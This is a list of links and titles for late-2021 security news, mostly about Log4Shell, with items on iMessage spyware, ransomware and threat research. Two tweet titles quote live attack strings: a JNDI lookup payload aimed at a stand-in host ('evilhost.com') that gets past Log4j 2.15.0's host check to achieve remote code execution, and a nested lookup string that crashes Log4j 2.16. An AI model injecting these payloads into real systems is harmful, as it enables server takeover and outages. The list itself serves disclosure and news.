Log4j – Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Red Sense - Intelligence Operations
https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement
[LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA
https://issues.apache.org/jira/browse/LOG4J2-3230
Project Zero: A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Pegasus vs. Predator: Dissident's Doubly-Infected iPhone Reveals Cytrox Mercenary Spyware - The Citizen Lab
https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Release v3.1.1.0 · lgandx/Responder · GitHub
https://github.com/lgandx/Responder/releases/tag/v3.1.1.0
Ian Beer on Twitter: "Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. https://t.co/RYsqpTHF5j" / Twitter
https://twitter.com/i41nbeer/status/1471163195679252484
Conti ransomware uses Log4j bug to hack VMware vCenter servers
https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
Tweet / Twitter
https://twitter.com/liamosaur/status/1471626232961716225
GitHub - back2root/log4shell-rex: PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
https://github.com/back2root/log4shell-rex
TellYouThePass ransomware via Log4Shell exploitation
https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html
Emergency Directive 22-02 (Closed) | CISA
http://cisa.gov/emergency-directive-22-02
New DarkHotel APT attack chain identified | Zscaler
https://www.zscaler.com/blogs/security-research/new-darkhotel-apt-attack-chain-identified
Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaTrace
https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/
Conti ransomware group adopts Log4Shell exploit
https://therecord.media/conti-ransomware-group-adopts-log4shell-exploit/
[#LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-3230
Cybersecurity and Infrastructure Security Agency on Twitter: "🚨 We issued Emergency Directive (ED) 22-02 in response to the Apache Log4j vulnerabilities. The ED requires action for federal civilian agencies to mitigate these vulnerabilities. We encourage all organizations to take similar steps: https://t.co/q9FWn00r4e https://t.co/dyHtd0B9Sl" / Twitter
https://twitter.com/CISAgov/status/1471869749164486656
vx-underground on Twitter: "New exploit on Friday, as is tradition: Researchers have discovered Log4J version 2.16 is vulnerable to DoS via "${${::-${::-$${::-j}}}}" More info: https://t.co/pzeWiQEa68" / Twitter
https://twitter.com/vxunderground/status/1471943986705281029
Apache Log4j Vulnerability Guidance | CISA
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
Vitali Kremez on Twitter: "🔥[Breaking blog] Ransomware Advisory:#Log4Shell Exploitation for Initial Access & Lateral Movement 1⃣Log4Shell |2⃣Discovery: Conti Becomes The First Sophisticated Crimeware Group Weaponizing Log4j2 |3⃣Early Warning: Ransomware Exploitation of Vuln https://t.co/kev5HbIVgS https://t.co/IiTlIXYCp6" / Twitter
https://twitter.com/VK_Intel/status/1471865226417119233
Chinese Spies Accused of Using Huawei in Secret Australian Telecom Hack - Bloomberg
https://www.bloomberg.com/news/articles/2021-12-16/chinese-spies-accused-of-using-huawei-in-secret-australian-telecom-hack
Kyle Alspach on Twitter: "In releasing #log4j threat data for free, @GreyNoiseIO decided “we don’t care about making money on this. We want to just get this out because everything’s on fire,” says @Andrew___Morris https://t.co/EqDJajNCeI #Log4Shell" / Twitter
https://twitter.com/KyleAlspach/status/1471910285153693699
The Web3 Fraud | USENIX
https://www.usenix.org/publications/loginonline/web3-fraud
regex101: build, test, and debug regex
http://regex101.com/r/KqGG3W/3
New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency
https://thehackernews.com/2021/12/new-phorpiex-botnet-variant-steals-half.html
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021
https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html
Google Online Security Blog: Understanding the Impact of Apache Log4j Vulnerability
https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
Sleep Mask Update in Cobalt Strike 4.5 | Cobalt Strike
https://www.cobaltstrike.com/blog/sleep-mask-update-in-cobalt-strike-4-5/
Dmitri Alperovitch on Twitter: "Wow. Just wow. This NSO zero-click iMessage exploit is the most impressive attack code I’ve ever seen. A whole computer architecture built out of a few logic operators… in an EXPLOIT! The talent of the individuals who came up and developed this technique is beyond impressive" / Twitter
https://twitter.com/DAlperovitch/status/1471359164093972481
Tweet / Twitter
https://twitter.com/jaxson_davidson/status/1470933731548356614
Tweet / Twitter
https://twitter.com/ncweaver/status/1471668214480334851
Márcio Almeida on Twitter: "FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n" / Twitter
https://twitter.com/marcioalm/status/1471740771581652995
Joseph Menn on Twitter: "IBM says under "ethical vulnerability disclosure management" it isn't warning of flaws: "This means that IBM does not confirm or otherwise disclose vulnerabilities externally, even to individual customers, until a fix or remediation is available." Is this normal behavior?" / Twitter
https://twitter.com/josephmenn/status/1471563546915835905
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI | Official Juniper Networks Blogs
https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi